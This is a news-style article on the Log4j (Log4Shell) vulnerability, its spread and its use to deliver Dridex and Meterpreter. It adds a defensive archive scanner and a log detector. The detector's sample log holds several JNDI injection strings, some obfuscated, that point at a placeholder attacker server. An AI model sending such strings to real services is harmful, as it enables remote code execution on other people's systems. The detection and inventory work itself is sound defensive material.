Be on the lookout for the Log4j vulnerability! As we enter the New Year, this nefarious software issue has many in the information technology industry in a state of worry.
Many organizations, especially small and medium-sized businesses (SMBs) with no IT personnel, are undoubtedly unaware of its existence. That lack of awareness makes them more vulnerable to an attack, because they have no way to defend against a flaw they do not know they have.
Log4j is an open-source Java logging library that is prevalent in software because it lets programs keep a record of what they have done. To avoid reinventing the wheel, developers pull in this shared library rather than writing their own logging or record-keeping code to do the same job.
Cybersecurity researchers recently discovered that if an application uses a vulnerable version of Log4j to log a specially crafted string, Log4j will fetch and execute attacker-supplied code instead of simply recording the text. As a result, malicious actors can take control of systems that run Log4j.
This news immediately put practically every major software company into crisis mode. They investigated their products to determine whether the Log4j vulnerability affected them and, if so, how to close the gap.
The scale of the exposure is significant. In the words of Theresa Payton, former White House chief information officer and current CEO of cybersecurity consultancy Fortalice Solutions, “Log4j has been around for more than a decade.”
“Think of it as your one-stop shop for anything loggable. We advise businesses to record everything, since you may need it for forensics later. As a result, Log4j is often used by Java developers when they wish to register that a person has signed in, and may even be used to monitor access to apps,” Payton said.
As a result, many firms may not even be aware that they have used Log4j, which makes it much more challenging to determine the severity of the issue. According to her, to find out, they would need a software engineer to go through their various systems and check for uses of the library, and then look at the versions.
According to Payton, “it may be a time-consuming procedure,” and time is limited when you are racing against the clock to stop bad actors from exploiting security flaws.
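The inventory step Payton describes can be largely automated. The Python script below is an added example written for this article, not code from the article, from Fortalice or from Apache. It walks a directory for .jar, .war and .ear archives, checks each one for log4j-core's JndiLookup class and for the version recorded in the library's Maven pom.properties, looks one level into nested archives (WAR lib directories, fat JARs), and flags anything below 2.16.0, the release that removed message lookups and disabled JNDI by default. The archives it scans are constructed fixtures built in a temporary directory so the script runs offline; the 2.16.0 threshold and the "stripped" case (JndiLookup.class deleted from the archive, one of the Apache-documented mitigations for deployments that could not upgrade) are assumptions of this example.

```python
"""Added example (not the article's or Apache's code): find log4j-core archives on disk
and report which are still exposed to Log4Shell. Fixture archives are constructed
below so the script runs offline."""
import io
import os
import re
import tempfile
import zipfile

ARCHIVES = (".jar", ".war", ".ear")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED = (2, 16, 0)  # assumption of this example: treat anything below 2.16.0 as exposed


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are
    dropped, which errs towards flagging old betas rather than missing them."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def version_from_pom(data):
    for line in data.decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def inspect_zip(zf, path, findings, depth=0):
    names = set(zf.namelist())
    has_jndi = JNDI_CLASS in names
    version = version_from_pom(zf.read(POM_PROPS)) if POM_PROPS in names else None
    if has_jndi or version:
        parsed = parse_version(version) if version else None
        if not has_jndi:
            status = "safe (JndiLookup.class removed)"
        elif parsed is None:
            status = "unknown version, JndiLookup present: review"
        elif parsed < FIXED:
            status = "VULNERABLE"
        else:
            status = "patched"
        findings.append((path, version or "?", status))
    if depth == 0:  # look one level into WAR/EAR libs and fat JARs
        for name in sorted(names):
            if name.endswith(ARCHIVES):
                try:
                    inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
                except zipfile.BadZipFile:
                    continue
                inspect_zip(inner, f"{path}!{name}", findings, depth + 1)


def scan(root):
    """Return sorted (path, version, status) for every log4j-core found under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.endswith(ARCHIVES):
                full = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(full) as zf:
                        inspect_zip(zf, full, findings)
                except zipfile.BadZipFile:
                    continue
    return sorted(findings)


def make_jar(target, version=None, include_jndi=True, nested=()):
    """Constructed fixture: a minimal archive with log4j-core's tell-tale entries."""
    with zipfile.ZipFile(target, "w") as zf:
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        if version:
            zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        for name, data in nested:
            zf.writestr(name, data)


def build_fixture(root):
    make_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1")
    make_jar(os.path.join(root, "log4j-core-2.17.1.jar"), "2.17.1")
    make_jar(os.path.join(root, "stripped-2.14.1.jar"), "2.14.1", include_jndi=False)
    make_jar(os.path.join(root, "plain.jar"), include_jndi=False)  # not log4j at all
    inner = io.BytesIO()
    make_jar(inner, "2.0-beta9")
    make_jar(os.path.join(root, "app.war"), include_jndi=False,
             nested=[("WEB-INF/lib/log4j-core-2.0-beta9.jar", inner.getvalue())])


def demo():
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return [(os.path.relpath(p, root), v, s) for p, v, s in scan(root)]


if __name__ == "__main__":
    for path, version, status in demo():
        print(f"{status:40} {version:10} {path}")
```

Point scan() at a real application directory instead of the fixture to use it in anger; it returns plain tuples so the results can be fed to a ticketing system. Inspecting only one nesting level is a deliberate limit, and a shaded JAR that relocates the log4j packages would be missed entirely, so treat this as a first pass alongside vendor advisories rather than as proof of absence.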
Back Door for Hackers
Consider a door lock of a kind used in security installations at millions of sites all over the globe to keep people and property safe. Now suppose a defect in one small internal part, shared by many different lock models, lets practically any key open the lock.
Changing your own lock is a simple task if you know about the defect and have the equipment to do the replacement. Doing so on a global scale is an overwhelming challenge. That principle is at the heart of the Log4j fiasco, and it is pretty concerning.
Log4j is a library for the Java programming language, which has been in use since the mid-1990s to develop applications. Software built on Log4j powers corporate and consumer applications worldwide.
Those that supply the digital backbone for millions of other applications, including cloud storage providers, are also affected. So are major software vendors whose apps are used on millions of devices.
As Payton noted, when a security vulnerability is discovered, the chief information security officer (CISO) is usually the one who takes the initiative to update and patch systems or put manual mitigations in place. Log4j is more subtle and harder to detect, and it is not entirely within the CISO's authority.
This vulnerability must be hunted down by everyone who writes code, and nowadays development happens almost everywhere. According to her, “developers might be internal personnel, outsourced development, offshore development, or third-party contractors.”
All of this adds up to an unending supply of attack opportunities for hackers. Of course, not everyone will be hacked, or at least not soon after the first attacks. The first important step is determining whether your systems contain the faulty code at all. IT departments and software developers are already suffering from information overload because of the discovery.
“The ramifications of someone taking advantage of this weakness are the stuff of nightmares for me.” Payton cautioned that “an unethical hacker with knowledge and access might take advantage of this vulnerability and attack servers utilizing this logging capability in conjunction with remote code execution on servers.”
Attack Vectors Widening
Hackers are now fully aware of the Log4j vulnerability and are actively exploiting it. According to cybersecurity researchers, numerous cases have been reported in which attackers have expanded the scope of their assaults.
In the early stages of the investigation, cybersecurity professionals assumed that the effect of Log4j was restricted to exposed and vulnerable servers. Researchers have since shown that anybody running a vulnerable Log4j version behind a listening service on their own computer or local network can be exploited simply by visiting a website that triggers the vulnerability: the page uses the visitor's browser to relay the malicious string to the local service.
WebSockets have previously been used for internal port scanning, but “this is one of the first remote code execution exploits to be relayed through WebSockets,” said Jake Williams, co-founder and CTO of incident response firm BreachQuest.
“However, no one’s viewpoint on vulnerability management should be altered as a result of this. Organizations should be putting out the effort to patch rapidly and mitigate by prohibiting outbound connections from potentially susceptible services when patching is not an option,” he said.
According to John Bambenek, chief threat hunter at digital IT and security operations company Netenrich, the local exploit is significant, but attackers would likely still prefer the remote exploit. Because of these developments, relying on a WAF or other network defenses is no longer a viable way to mitigate this threat.
The single most critical action an organization can take, according to him, is patching.
Threat actors already have a pretty simple attack vector for the Log4j vulnerability, which has been dubbed Log4Shell, according to research by Blumira. No authentication is needed to gain complete control of a vulnerable web server.
Attackers can use this vulnerability to make the application load classes from an attacker-controlled server through lookups such as ${jndi:ldap://...} and ${jndi:ldaps://...}, and then drop shells to carry out the RCE attack without any further effort. According to Blumira, the new attack vector increases the attack surface of Log4j even more: it can affect services that are running on localhost and are not reachable from the internet.
“When the Log4j vulnerability was publicly disclosed, it became immediately evident that it had the potential to grow into a more serious issue,” said Matthew Warner, CTO and co-founder of Blumira. This attack vector “opens up a range of possible malevolent use cases, from malvertising to establishing watering holes for drive-by assaults,” he said.
In addition, by bringing this information to light, he says, “organizations will have the chance to respond immediately and defend themselves against malevolent threat actors.”
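Blumira's point that the payload can arrive from anywhere, including from a browser on the local network, means the string itself is what to hunt for in request logs and WebSocket traffic. The detector below is an added example written for this article, not Blumira's or Apache's code. It mimics the way Log4j resolves nested lookups innermost-first (the lower: and upper: lookups and the ${name:-default} fallback syntax) so that obfuscated forms such as ${${lower:j}ndi:...} and ${${::-j}${::-n}${::-d}${::-i}:...} collapse to ${jndi:...} before matching. Two design choices are assumptions of the example: the jndi prefix is matched case-insensitively, and unknown lookups without a default resolve to an empty string, which over-approximates Log4j (it would leave them verbatim) but is the safe direction for a detector. The access-log lines, addresses and URLs are constructed for the example.

```python
"""Added example (not the article's, Blumira's or Apache's code): detect Log4Shell
probes in access logs, including the obfuscated forms used to evade a naive
'${jndi:' match. Log4j resolves nested lookups innermost-first, so the detector
does the same before looking for the jndi: prefix. All log lines are constructed."""
import re

INNERMOST = re.compile(r"\$\{([^${}]*)\}")  # a lookup with no lookup nested inside
JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):([^}]*)\}?", re.IGNORECASE)


def evaluate(body):
    """Evaluate one innermost lookup body the way Log4j does for the lookups that
    matter to obfuscation: lower:, upper:, and the ${name:-default} fallback.
    Unknown lookups without a default become '' (Log4j would leave them verbatim;
    over-approximating is the safe direction for a detector)."""
    parts = body.split(":-", 1)
    name, default = parts[0], (parts[1] if len(parts) == 2 else None)
    if name.startswith("lower:"):
        return name[len("lower:"):].lower()
    if name.startswith("upper:"):
        return name[len("upper:"):].upper()
    return default if default is not None else ""


def normalize(text, max_rounds=50):
    """Collapse nested lookups until only jndi: lookups (or nothing) remain."""
    for _ in range(max_rounds):
        new = INNERMOST.sub(
            lambda m: m.group(0) if m.group(1).lower().startswith("jndi:")
            else evaluate(m.group(1)),
            text,
        )
        if new == text:
            return text
        text = new
    return text


def scan_lines(lines):
    """Return (line_number, scheme, target) for each line carrying a jndi lookup."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = JNDI.search(normalize(line))
        if m:
            findings.append((number, m.group(1).lower(), m.group(2)))
    return findings


# Constructed sample access log; 198.51.100.0/24 is a documentation address range.
SAMPLE_LOG = [
    '198.51.100.20 - - [10/Dec/2021:10:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.22 - - [10/Dec/2021:10:00:03 +0000] "GET /?x=${${lower:j}${upper:n}${::-d}${env:NaN:-i}:ldaps://198.51.100.7/x} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.23 - - [10/Dec/2021:10:00:04 +0000] "POST /api HTTP/1.1" 200 12 "${jndi:${lower:r}mi://198.51.100.7/y}" "-"',
    '198.51.100.24 - - [10/Dec/2021:10:00:05 +0000] "GET /report?tpl=${date:yyyy}-${env:HOME} HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '198.51.100.25 - - [10/Dec/2021:10:00:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:${lower:JNDI}}:dns://198.51.100.7/z}"',
]


def demo():
    return scan_lines(SAMPLE_LOG)


if __name__ == "__main__":
    for number, scheme, target in demo():
        print(f"line {number}: jndi lookup via {scheme} -> {target}")
```

Lines 1 and 5 stay clean even though line 5 contains lookups, which is the point: matching on the literal text `${jndi:` would catch only line 2, while normalising first catches the mixed-case, default-value and nested variants on lines 3, 4 and 6 as well. Feed it the User-Agent, Referer, query string and any other header the application might log; since the payload can be relayed from a browser, the same check belongs on whatever internal service accepts WebSocket or HTTP input from the local network.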
Log4j Linked to Dridex, Meterpreter
Exploitation is already feeding established malware. As reported by Bleeping Computer, researchers have uncovered Log4Shell being used as a new delivery channel that lets the infamous Dridex banking trojan, or Meterpreter, infiltrate susceptible devices and spread further.
Dridex is a banking trojan originally built to steal online banking credentials and later used to steal credit card information. It has since evolved into a loader that downloads numerous modules to perform tasks such as installing further payloads, spreading to new devices, and capturing screenshots.
Dridex primarily targets Windows, but if it lands on a system that is not running Windows, it downloads and runs a Python script for Linux/Unix that installs Meterpreter instead.
Meterpreter, a Metasploit attack payload, is launched through in-memory DLL injection, lives only in memory, and writes nothing to disk. It gives the attacker an interactive shell that can be used to explore the target system and execute programs on it.
Jen Easterly, the Director of the Cybersecurity and Infrastructure Security Agency of the United States, said in recent media appearances that the Log4j hole is the most significant weakness she has encountered in her decades-long experience as a cybersecurity professional. According to cybersecurity experts, the Log4j vulnerability is the most consequential software flaw in history in terms of the number of services, websites, and devices affected.